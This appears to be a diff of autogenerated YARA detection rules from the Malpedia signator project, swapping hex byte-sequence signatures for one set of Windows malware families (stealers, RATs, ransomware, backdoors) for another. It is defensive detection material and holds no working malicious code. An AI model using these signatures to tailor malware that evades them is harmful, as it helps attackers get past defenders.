-		$sequence_2 = { db45fc dd5dd4 dc65d4 dd5dcc db45f8 dd5dc4 }
-		$sequence_3 = { dc442410 dd5c2410 e9???????? db8740010000 dc6c2418 dd5c2418 e9???????? }
-		$sequence_4 = { dd442404 dc0d???????? c3 83c0fe 83f803 0f87cd000000 ff2485bcd24500 }
-		$sequence_5 = { 7414 3d00020000 741a 8d542464 52 ff15???????? ebb2 }
-		$sequence_6 = { ff45f8 f682c1ed660004 894d08 7457 803900 7504 33ff }
-		$sequence_7 = { 53 e8???????? 83c404 8b45ec e9???????? 8be5 5d }
-		$sequence_8 = { 64890d00000000 83c478 c20c00 8b8c2490000000 8b4658 5f 5e }
-		$sequence_9 = { ffd3 c786c400000000000000 57 ff15???????? 8b4c2440 5f 5e }
+		$sequence_0 = { 895104 47 ff15???????? eb58 8d45ec 50 8d45f4 }
+		$sequence_1 = { eb1e ff7508 8d8568fbffff 50 }
+		$sequence_2 = { 85c0 0f850e020000 57 6a40 59 889ddcfdffff 8dbdddfdffff }
+		$sequence_3 = { 8b4b04 56 8b7308 8bc1 03f2 3bf0 8945fc }
+		$sequence_4 = { ff55e0 3bc6 8945e4 740b 3dea000000 0f85fd000000 8b7df4 }
+		$sequence_5 = { 7584 85ff 7407 57 ff15???????? 33c0 40 }
+		$sequence_6 = { 8b3d???????? be???????? 7579 ffd7 }
+		$sequence_7 = { a0???????? c3 e8???????? 84c0 740c 833d????????05 }
+		$sequence_8 = { 81ecb8080000 53 8b5d08 68???????? 53 c745e8d4070000 e8???????? }
+		$sequence_9 = { 7416 48 740c 83e804 754a 68???????? }
 
 	condition:
-		7 of them and filesize < 5177344
+		7 of them and filesize < 94208
 }
-rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
+rule MALPEDIA_Win_Photofork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f91473e-0f59-5d43-b31c-36e662e7cb73"
+		id = "03f3231c-1475-52ed-bb16-632751ac4d12"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arkei_stealer_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photofork_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ce62b8dc4f39a6203176e1a77c002f4403d000ee3dbdbb3ae02c853f65ed371e"
+		logic_hash = "709bae5e70c248514471207a86aa73bde84d2e17312283aa497e33ccd6cf6fc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106431,32 +106828,32 @@ rule MALPEDIA_Win_Arkei_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f849ffeffff ba424d0000 668955ec 8b4620 8b0e 8d1481 }
-		$sequence_1 = { 57 57 68000000c0 68???????? ff15???????? 8bf8 }
-		$sequence_2 = { 52 57 8945f6 ff15???????? 85c0 0f8458feffff 8b4e20 }
-		$sequence_3 = { 6689460c 668b4dd6 66894e0e 6683fb18 }
-		$sequence_4 = { ff15???????? 85c0 74be 8b45e0 }
-		$sequence_5 = { 8d55ec 52 57 8945f6 }
-		$sequence_6 = { 895608 668b45d4 6689460c 668b4dd6 66894e0e }
-		$sequence_7 = { 8b16 8d448a0e 6a00 8d4de4 51 6a0e }
-		$sequence_8 = { 74be 8b45e0 8d55c4 52 6a18 50 }
-		$sequence_9 = { 57 8945e8 ffd3 6a0a 57 8bf0 }
+		$sequence_0 = { 4d85d2 7515 8d56fc 33c9 41b8fe6a7a69 e8???????? }
+		$sequence_1 = { 4156 4883ec60 49894ba8 4533e4 }
+		$sequence_2 = { 488b0d???????? 488981e0100000 eb12 ba01000000 }
+		$sequence_3 = { 4c894858 33d2 41b800800000 488bcf 41ffd1 33c0 4881c4a0000000 }
+		$sequence_4 = { 4c8d45c4 eb72 488b05???????? 4885c0 742c 488b8080010000 }
+		$sequence_5 = { 0f85b9010000 ff15???????? 83f87a 0f85aa010000 8b8424d0000000 }
+		$sequence_6 = { 5e 5d c3 498bdf 6690 80bbc001000030 }
+		$sequence_7 = { 4c8bc6 488d950c020000 e8???????? 488d5590 }
+		$sequence_8 = { 488bd0 488b05???????? 48899040060000 488d4dc0 ffd2 66837dc009 b840000000 }
+		$sequence_9 = { 72ea 4533c9 4c8d459c 488d54242c }
 
 	condition:
-		7 of them and filesize < 1744896
+		7 of them and filesize < 99328
 }
-rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
+rule MALPEDIA_Win_Gameover_Dga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "62a3ce73-baac-56a1-82cb-c062e0eed183"
+		id = "03fc91af-7fd0-5c49-806f-66baee40bb34"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strifewater_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gameover_dga_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "04a48ee28febde8895539bb526c6ef5f904eb84967ebbad205245d5d96a955aa"
+		logic_hash = "0d50d6a34d24e697f3e47548c11296361a501bf8307c9f90af33f306f5bb9e63"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106470,34 +106867,34 @@ rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b7c2478 4883c450 415e c3 488d151f910400 488d4c2420 e8???????? }
-		$sequence_1 = { 48895320 488d3d472d0800 be05000000 498bd5 8bce }
-		$sequence_2 = { 488b07 48634804 4803cf 85f6 741a 8b5110 0bd6 }
-		$sequence_3 = { 90 498b06 488b5858 488bcb e8???????? 4c8d4def 4c8d056e710500 }
-		$sequence_4 = { 48c7442420feffffff 48895c2440 488bf9 488d056ae70800 488901 4883c140 4533c0 }
-		$sequence_5 = { e9???????? 488b9540070000 4c8d0526ae0100 498bce e8???????? 85c0 }
-		$sequence_6 = { 488d0595ec0500 488906 eb02 33f6 4c8b05???????? 4d85c0 753c }
-		$sequence_7 = { 48634804 83640c48fb 4533ff eb0d 408ad7 488d4c2430 e8???????? }
-		$sequence_8 = { 48898424f0000000 488b4e08 4885c9 7509 488d1598330900 eb0d 488b5128 }
-		$sequence_9 = { 8bc3 874710 85c0 7421 8365d800 488d059ca1feff 488945e0 }
+		$sequence_0 = { 884617 33c0 40 e9???????? 8a4601 33db 8b6c2434 }
+		$sequence_1 = { 8b13 8bcb 6a01 57 56 ff742420 ff742420 }
+		$sequence_2 = { 8bf8 83cdff 3bfd 7504 8bc5 eb42 }
+		$sequence_3 = { 55 8bac2434010000 56 57 8bf9 8b4508 85c0 }
+		$sequence_4 = { 39442414 0f85eb060000 8b84245c010000 41 894c2420 40 50 }
+		$sequence_5 = { 85db 7417 6af6 6a01 ff742434 ffd3 85c0 }
+		$sequence_6 = { ff7064 ffd6 85c0 0f8513010000 a1???????? 68???????? ff7064 }
+		$sequence_7 = { 8b4c2424 b301 8901 5d 8bce e8???????? }
+		$sequence_8 = { 8bc2 83c204 3b54241c 7725 8a5c2428 8818 8a5c2413 }
+		$sequence_9 = { 0f851f010000 8b442414 8d542428 52 53 ff742450 8b08 }
 
 	condition:
-		7 of them and filesize < 1552384
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Scout_Auto : FILE
+rule MALPEDIA_Win_Strelastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e14921fe-74c7-5cda-92ba-67e7cc0f28ef"
+		id = "8e21e6c9-b196-5772-9b5f-024320f3473e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scout_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strelastealer_auto.yar#L1-L230"
 		license_url = "N/A"
-		logic_hash = "3e6544ff6fee99e30b42c384814b4a00494424215e1f894b7afbd76f2c9391e8"
+		logic_hash = "fdd1b910b27b0b34d135da8196d66e4e45cba2823b849a416c07e1720765f896"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -106509,32 +106906,46 @@ rule MALPEDIA_Win_Scout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 817c243031313131 7445 690d????????60ea0000 ff15???????? 8b0d???????? b867666666 ffc1 }
-		$sequence_1 = { 8d58b0 498bce 448bc3 488d154cac0000 e8???????? 85c0 }
-		$sequence_2 = { 7706 ff15???????? 488364243000 488d0d849f0000 8364242800 41b803000000 4533c9 }
-		$sequence_3 = { 83c8ff eb0b 4803f6 418b84f728950100 }
-		$sequence_4 = { 0f84aa000000 83f81a 0f85eb020000 33ff 488d4c2430 48897c2430 }
-		$sequence_5 = { 488b8d80140000 ff15???????? 488d537c 41b888140000 }
-		$sequence_6 = { 4885c9 750b 488d0d29f10000 48894b48 4963d0 e8???????? }
-		$sequence_7 = { 488d0d36fbfeff 83e03f 458be9 4d03e8 4c8945df 4c8be6 }
-		$sequence_8 = { 488d0dd4f90000 4183e23f 4d03f0 4d8bf8 }
-		$sequence_9 = { 0f84aa000000 83f81a 0f85eb020000 33ff 488d4c2430 48897c2430 e8???????? }
+		$sequence_0 = { 488d0575910000 41b91b000000 4889442420 e8???????? 4883c438 }
+		$sequence_1 = { ff15???????? 85c0 0f854effffff 488bcb ff15???????? 4881c4d8050000 }
+		$sequence_2 = { 50 e8???????? 8b44242c 83c40c 53 53 }
+		$sequence_3 = { 08c1 20ca 80f101 89c8 }
+		$sequence_4 = { a1???????? 668b08 56 8d5306 55 }
+		$sequence_5 = { 488bc2 488d0d05c50000 0f57c0 48890b }
+		$sequence_6 = { 015304 eb55 4d85c0 7e27 488bd7 4c8b4dc7 4b8b8ccbc0120600 }
+		$sequence_7 = { 53 53 6804010000 8d94247c030000 52 }
+		$sequence_8 = { 488d05bd430100 488945e0 895128 488d0d87a30000 }
+		$sequence_9 = { 56 53 57 ff15???????? 8bf0 8b442418 8930 }
+		$sequence_10 = { 08c1 08da 80f201 89c8 }
+		$sequence_11 = { 08c1 0f1f440000 b810000000 e8???????? }
+		$sequence_12 = { b913000000 4c8d05d3800000 e8???????? 4885c0 7417 49ba7032d8542306ddea }
+		$sequence_13 = { 488d05afff0000 483bd8 74d1 488bcb }
+		$sequence_14 = { 8945e4 3d00010000 7d10 8a8c181d010000 888810b80010 40 }
+		$sequence_15 = { 03c7 751f 488b85a0010000 488b8888000000 488d0505540100 }
+		$sequence_16 = { 50 6819000200 53 8d8c246c010000 51 6801000080 }
+		$sequence_17 = { 488d4c2430 ff15???????? 488d3d2a5e0100 488bcf ff15???????? }
+		$sequence_18 = { 0fb6c0 eb12 8b45e0 8a8014b90010 08443b1d 0fb64601 47 }
+		$sequence_19 = { 01c7 897d14 8d1401 81c200040000 }
+		$sequence_20 = { 01c1 b8dc8856d3 29c8 b9dd8856d3 }
+		$sequence_21 = { 33c9 4c8d054be10000 488d154ce10000 e8???????? 4885c0 740f 488bcb }
+		$sequence_22 = { 305106 33d2 f7f6 0fb68220a30010 304107 }
+		$sequence_23 = { 08c1 08d3 89ca 80e201 }
 
 	condition:
-		7 of them and filesize < 315392
+		7 of them and filesize < 872448
 }
-rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Globeimposter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8c4fb8e-665a-53b6-8b3e-37d64668f35c"
+		id = "82e87f91-7017-50a0-9ca4-45151fd590f0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.3cx_backdoor_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.globeimposter_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "1c7c6f3ffb80a119e6e9a09aa255f11daa8a6a0cadae64c0d2cee6a1f6aea1e9"
+		logic_hash = "6357ace0b94e1815a02ef2680ddeaabe7f1f4794f51d0c9008b25b79555a5d01"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106548,32 +106959,32 @@ rule MALPEDIA_Win_3Cx_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d442420 488d4d98 e8???????? 488bf8 488d542478 498bce e8???????? }
-		$sequence_1 = { 488b4d8f 4c8d05b77c0300 41b920000000 c744242000000000 488d15c27c0300 ff15???????? }
-		$sequence_2 = { 41b8ffffffff 488bd6 ff15???????? ba25000000 8d4a1b }
-		$sequence_3 = { 0f87ff010000 c1e60a 81c60024a0fc 03f0 eb11 8d860024ffff }
-		$sequence_4 = { 488bd7 498bcd e8???????? 498bc4 4c8d5c2450 498b5b40 }
-		$sequence_5 = { 488d0547ac0100 4a8b04f8 42f644e83801 7515 e8???????? c70009000000 e8???????? }
-		$sequence_6 = { 7424 488b4308 44386019 7515 6690 483b5810 750d }
-		$sequence_7 = { 488bc8 e8???????? 4889751f 4889752f 48897537 }
-		$sequence_8 = { e8???????? 85c0 0f85cd100000 e9???????? 4c8d050bae0000 ebdb 4c8d05faad0000 }
-		$sequence_9 = { 83b96804000002 0f8406020000 bd20000000 4c8d35e1510100 488b4310 }
+		$sequence_0 = { 837c243020 57 8bfd 7608 6ac4 58 }
+		$sequence_1 = { 57 83fd08 0f8205010000 8bc5 }
+		$sequence_2 = { 85ff 7452 8bef 8bf0 8b06 8d7604 }
+		$sequence_3 = { 8b4508 8b4e08 89442418 85ff 7452 }
+		$sequence_4 = { e8???????? 85f6 7408 8d8600bdffff }
+		$sequence_5 = { 3dfa000000 7205 6a0c 5f eb0d }
+		$sequence_6 = { 6af4 58 e9???????? 7904 }
+		$sequence_7 = { ff15???????? ff349f 8bf0 ff15???????? 3bf0 }
+		$sequence_8 = { 7505 6ac4 58 eb2f }
+		$sequence_9 = { 7508 6af4 58 e9???????? 7904 6af6 }
 
 	condition:
-		7 of them and filesize < 585728
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Sword_Auto : FILE
+rule MALPEDIA_Win_Beast_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8539535f-357d-5d16-925a-82cf11392564"
+		id = "8074f5ee-0705-556f-a60f-20fb83a7b6d6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sword_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beast"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beast_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f965a414f19aed1fee3b06d38e5b293cff63935b0d3b803549aab6fbb9244e65"
+		logic_hash = "2393b8a862cb3a2be574fd4cc7aaf3b89fb385083cd12b93e8f9ad9b9f239f88"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106587,95 +106998,71 @@ rule MALPEDIA_Win_Sword_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897c242c 8b3d???????? 6800010000 c74424143c000000 c744242064924000 89542424 }
-		$sequence_1 = { f2ae f7d1 49 8d842488020000 51 50 56 }
-		$sequence_2 = { 8bfd 83c9ff 33c0 f2ae 8b542424 33db f7d1 }
-		$sequence_3 = { e8???????? 83c404 50 ff15???????? 668944240a 8d842428040000 50 }
-		$sequence_4 = { 7c85 5f 5e 5d b801000000 5b 83c40c }
-		$sequence_5 = { 8d8c2498060000 51 52 e8???????? 83c40c 8d842474020000 }
-		$sequence_6 = { 8d942488030000 f2ae f7d1 2bf9 53 8bf7 8bfa }
-		$sequence_7 = { 52 e8???????? 8818 8d842490020000 }
-		$sequence_8 = { 6a00 6a00 6a00 7509 8d542414 }
-		$sequence_9 = { 8d3c8d00a14000 c1e603 8b0f f644310401 7456 50 e8???????? }
+		$sequence_0 = { 56 57 33ff 6a03 47 59 }
+		$sequence_1 = { 330c8550b44f00 334d1c 83c520 894c242c 83ef01 0f85f0fdffff 8b442410 }
+		$sequence_2 = { c6857fffffff41 c6458033 c6458141 c6458224 c6458341 c6458420 c6458541 }
+		$sequence_3 = { eb08 8b4dc4 e8???????? 8bc6 5e c9 c3 }
+		$sequence_4 = { c6855cfcffff4d 889d5dfcffff c6855efcffff4c 889d5ffcffff c68560fcffff5b 889d61fcffff 889d62fcffff }
+		$sequence_5 = { 33b1393e5000 8b4c2448 0fb6c9 c1e104 33b9303e5000 33b1343e5000 8b4c2428 }
+		$sequence_6 = { 6a3f 5a 6a06 898c244a010000 8db424b8000000 898c2452010000 8dbc2460010000 }
+		$sequence_7 = { 8d143e 03c2 8945f0 8b45cc c1e017 0bc8 8b45cc }
+		$sequence_8 = { 8b45c8 03c3 33d0 c1c210 8d0c16 8b75f4 33d9 }
+		$sequence_9 = { c6459025 8bd3 c6459156 c6459223 c6459356 c6459435 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 2411520
 }
-rule MALPEDIA_Win_Ghost_Rat_Auto : FILE
+rule MALPEDIA_Win_Rorschach_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5c1e7c4-1b2d-598f-9f4c-addb333c7981"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghost_rat_auto.yar#L1-L313"
+		id = "11b24b2d-bfea-5a8c-988f-bea7ea32170c"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rorschach_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1382f8506f533271928000e01179914edf911c946385102a130b99bae8ad91d3"
+		logic_hash = "3819d2826273a95ad95ce552fb76b197f4eb30ddd0b4d089208f0442591f4b17"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd9 e8???????? 8b4d08 3bc8 }
-		$sequence_1 = { 8b400c 85c0 7505 a1???????? 50 8bce e8???????? }
-		$sequence_2 = { 6a01 56 ff15???????? 5e c20800 }
-		$sequence_3 = { 33c0 5b 8be5 5d c20400 894df4 }
-		$sequence_4 = { c745f800000000 df6df4 83ec08 dc0d???????? }
-		$sequence_5 = { c20400 894df4 c745f800000000 df6df4 }
-		$sequence_6 = { 6a6b 8bce e8???????? 5f 5e }
-		$sequence_7 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e }
-		$sequence_8 = { 68???????? 68???????? 6a00 6a00 c705????????20010000 e8???????? 8b35???????? }
-		$sequence_9 = { e8???????? 8b8e549f0000 83c41c 89848e14030000 }
-		$sequence_10 = { e8???????? 83c40c ff7508 6a40 ff15???????? }
-		$sequence_11 = { ff7510 ff75dc ff15???????? 85c0 7507 }
-		$sequence_12 = { e9???????? 8d45dc 50 681f000200 }
-		$sequence_13 = { f7d1 49 7509 5f 5e 5b }
-		$sequence_14 = { 83c408 e8???????? c1e00a 6a04 }
-		$sequence_15 = { e8???????? 6a6f 8bce e8???????? 5e }
-		$sequence_16 = { 8dbd85feffff f3ab 66ab aa }
-		$sequence_17 = { 83c12c e9???????? 8b4df0 83c154 e9???????? 8b4df0 83c17c }
-		$sequence_18 = { 8d4e10 e8???????? 6a6b 8bce }
-		$sequence_19 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 }
-		$sequence_20 = { e8???????? 84c0 7505 83ceff eb2c }
-		$sequence_21 = { 89849614030000 8b86549f0000 40 8986549f0000 }
-		$sequence_22 = { 6a00 ff7628 ff15???????? 6a01 ff7620 ff15???????? 8b4e04 }
-		$sequence_23 = { 8bce ff75e8 e8???????? 8bce e8???????? 6a00 }
-		$sequence_24 = { ff15???????? 6800000002 6a00 6a00 ff15???????? }
-		$sequence_25 = { 6a00 6a00 6838040000 6a00 6a00 }
-		$sequence_26 = { 83e9fc c7014c696272 83e9fc c70161727941 83e9fc c70100000000 }
-		$sequence_27 = { 8b4608 8b7e20 8b36 813f6b006500 7406 813f4b004500 75e8 }
-		$sequence_28 = { ff8b8d60ffff ff03 0c90 898df4feffff }
-		$sequence_29 = { 8b4df0 51 8b9558ffffff 52 8b8560ffffff 50 }
-		$sequence_30 = { 83c40c c7856cffffff00000000 eb0f 8b8d6cffffff 83c101 }
-		$sequence_31 = { 03480c 894dc0 8b55c0 52 8b450c }
-		$sequence_32 = { 8d9530ffffff 52 6a40 8b4580 }
-		$sequence_33 = { 8b423c 8945ec 8b8d58ffffff 034dec }
+		$sequence_0 = { f30f6f440420 f30f6f0c28 660fefc8 f30f7f0c30 418d40f0 f30f6f440420 f30f6f0c28 }
+		$sequence_1 = { e8???????? 8885f6050000 b261 488d8d70050000 e8???????? 8885f7050000 33d2 }
+		$sequence_2 = { ff15???????? 85c0 7414 488b4c2438 4c8d442444 488d5570 ff15???????? }
+		$sequence_3 = { eb04 33c0 8bd8 b978110000 e8???????? 488bf8 48894540 }
+		$sequence_4 = { 488d4d28 e8???????? 884529 33d2 488d4d28 e8???????? 88452a }
+		$sequence_5 = { 488d8d00010000 e8???????? 88850f010000 33d2 488d8d00010000 e8???????? 888510010000 }
+		$sequence_6 = { e8???????? 488d8598070000 488985b80c0000 c6454069 b273 488d4d40 e8???????? }
+		$sequence_7 = { 48897820 488b05???????? 4833c4 488985f0020000 bae9030000 ff15???????? 488bf0 }
+		$sequence_8 = { e8???????? 8885d7060000 33d2 488d8dd0060000 e8???????? 8885d8060000 b26b }
+		$sequence_9 = { 8885f60b0000 b23c 488d8d300b0000 e8???????? 8885f70b0000 33d2 488d8d300b0000 }
 
 	condition:
-		7 of them and filesize < 357376
+		7 of them and filesize < 3921930
 }
-rule MALPEDIA_Win_Koiloader_Auto : FILE
+rule MALPEDIA_Win_Sidewinder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e4efaa4-8409-52c6-a357-d4b16d12b604"
+		id = "cc151d68-8079-5f48-8578-23ad18a0a4e7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.koiloader_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sidewinder_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a14056c4d5487fcde976e3de41a707b0de19ece78e34b4f5bb62e5e5638e41ed"
+		logic_hash = "e4a063cf875d6c669e0a5700a0f46ba681b39263a023b07ff990bd59cdb78477"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106689,32 +107076,32 @@ rule MALPEDIA_Win_Koiloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bd1 72f2 c6043100 8d5e12 668b4712 33c9 66894610 }
-		$sequence_1 = { 88840d80fdffff 41 83f950 72ec 8d9580fdffff 8d8d98f1ffff }
-		$sequence_2 = { 83c308 03ca 894dc8 8b7904 83ef08 d1ef }
-		$sequence_3 = { 8d8d2cfbffff e8???????? 8d8d2cfbffff e8???????? 33c9 }
-		$sequence_4 = { 8be5 5d c20400 56 8b35???????? 6a00 ffd6 }
-		$sequence_5 = { 8d8d28f5ffff e8???????? 8d8d28f5ffff e8???????? 33c9 }
-		$sequence_6 = { 46 807c35c000 75f8 33ff 90 e8???????? 33d2 }
-		$sequence_7 = { 8b7dcc 85ff 7426 8b45d0 33c9 8d1c00 85db }
-		$sequence_8 = { 8d4df8 51 0f47c2 50 8d8584fbffff 50 ff75f0 }
-		$sequence_9 = { e8???????? 33c9 66660f1f840000000000 8a840d70edffff 88840d60ffffff 41 83f950 }
+		$sequence_0 = { 8945cc 837dcc00 0f8e37030000 0fbf4510 85c0 740e ff75c0 }
+		$sequence_1 = { dfe0 9e 740e dd45cc dc1d???????? dfe0 9e }
+		$sequence_2 = { 8d45b8 50 8d45c8 50 8d45d8 50 8d45a8 }
+		$sequence_3 = { dbe2 8945dc 837ddc00 7d17 6a3c 68???????? ff75ec }
+		$sequence_4 = { 817da0a3000000 750a 66830d????????ff eb54 837da058 740c 837da043 }
+		$sequence_5 = { 8965f8 c745fc???????? 6a02 59 e8???????? 668945e0 8b4508 }
+		$sequence_6 = { 50 6a00 e8???????? 8d45d4 50 6a00 e8???????? }
+		$sequence_7 = { 83a59cfeffff00 8b45a0 89853cffffff 8d855cffffff 50 8b853cffffff 8b00 }
+		$sequence_8 = { eb09 8d45ec 89856cffffff 8b856cffffff 8b00 8945b0 8d45d0 }
+		$sequence_9 = { e8???????? 898560ffffff eb07 83a560ffffff00 8b45c8 894588 c745b004000280 }
 
 	condition:
-		7 of them and filesize < 101376
+		7 of them and filesize < 679936
 }
-rule MALPEDIA_Win_Backbend_Auto : FILE
+rule MALPEDIA_Win_Darkshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7ec5485-6e9e-5eb4-aaaa-c0daf2bd8fb9"
+		id = "0b6aea26-4d2d-5fe4-85ac-1a4c560ab87d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backbend_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkshell_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "935509ae6988f2d539b3ef5a76f3b49b19110a268e5a967dacc21ae1460d274a"
+		logic_hash = "adda1c8d572ab121457592ba92d94ead9ada07c703fcce314ed00968f454839e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -106728,32 +107115,32 @@ rule MALPEDIA_Win_Backbend_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c40c 8d45f0 c745d801000000 66c745dc0500 50 }
-		$sequence_1 = { 56 ffd3 6a00 8d8500ffffff }
-		$sequence_2 = { c3 8b442404 8a08 84c9 7408 80e904 }
-		$sequence_3 = { ebf2 c3 55 8bec 81ec0c010000 }
-		$sequence_4 = { 6860ea0000 ffd6 33c0 8d8d00feffff 50 }
-		$sequence_5 = { 50 e8???????? 8d8500fbffff 53 50 e8???????? }
-		$sequence_6 = { c605????????43 ff15???????? 8bf0 68???????? }
-		$sequence_7 = { 85c0 7508 6a01 58 e9???????? 6a07 }
-		$sequence_8 = { 57 ffd6 85c0 740b 50 ff15???????? }
-		$sequence_9 = { c745d801000000 66c745dc0500 50 8d45ac 50 53 }
